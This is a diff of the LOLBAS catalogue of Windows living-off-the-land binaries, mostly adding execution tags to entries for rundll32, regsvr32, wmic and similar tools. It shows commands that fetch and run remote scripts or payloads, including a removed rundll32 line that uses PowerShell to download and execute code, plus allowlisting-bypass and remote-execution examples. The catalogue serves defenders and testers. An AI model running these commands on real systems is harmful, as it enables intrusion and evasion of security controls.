b/yml/OSBinaries/Pnputil.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1547 OperatingSystem: Windows 7, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\system32\pnputil.exe Code_Sample: diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 8a1b221..0898d43 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 0d29e27..16d6a11 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 2272b26..a5314d1 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -5,15 +5,14 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -22,8 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 3a65a66..b1fde20 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -5,25 +5,23 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 27067b8..979d24d 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -25,6 +30,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -32,6 +40,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index ba5d622..d1941d1 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -22,13 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. - Usecase: Execute code from Internet - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -36,13 +30,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -50,6 +39,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream @@ -67,7 +58,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - - Execute: DLL + - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 4437afe..eafab60 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index b3191dc..40b17aa 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 95cbcb6..cd8d443 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index f8fa24a..7766c06 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index f439dc8..a938e76 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index be2a779..bd8b118 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 734aba2..4e4dd1d 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index aa20ad9..975c831 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 4c17e63..7b12cf3 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 + Tags: + - Execute: CMD - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index a2f312e..8c62daf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 085a982..2ab7e48 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 31c79c1..145bd6f 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 + Tags: + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1909 and below + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d2125bd..7c51f38 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 + Tags: + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index d05fd20..541818d 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 0511e95..4ede887 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -11,8 +11,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -20,8 +18,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index cf8fa72..55724db 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6bec321..6fa837f 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f5ad51e..f914071 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 9ceccc7..913ce05 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 8c1a996..5cb953c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system @@ -40,7 +50,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL + - Execute: Remote - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" Description: Copy file from source to destination. Usecase: Copy file. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index ef8045c..d2dd19a 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 549b609..f7fbc3c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 7bfe43d..b6204bf 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -27,6 +27,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index 83f76cd..57a163a 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -11,6 +11,8 @@ Commands: Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 7b54dac..b83e0e7 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b09f76a..f445a41 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -19,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -36,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 163badf..935a6f5 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 36fd9d9..3796255 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSLibraries/Ieadvpack.yml 